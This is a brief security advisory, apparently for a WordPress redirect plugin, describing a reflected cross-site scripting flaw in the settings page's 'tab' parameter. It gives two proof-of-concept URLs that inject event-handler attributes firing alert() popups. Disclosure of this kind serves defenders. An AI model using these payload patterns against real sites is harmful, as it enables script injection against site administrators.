The settings page of the plugin did not properly sanitise the tab parameter before outputting it back, leading to a reflected Cross-Site Scripting issue
https://example.com/wp-admin/options-general.php?page=moove-redirect-settings&tab=" onMouseOver="alert(1);
https://example.com/wp-admin/options-general.php?page=moove-redirect-settings&tab="+style%3D"animation-name%3Aspinner"+onanimationstart%3D"alert(%2FXSS%2F)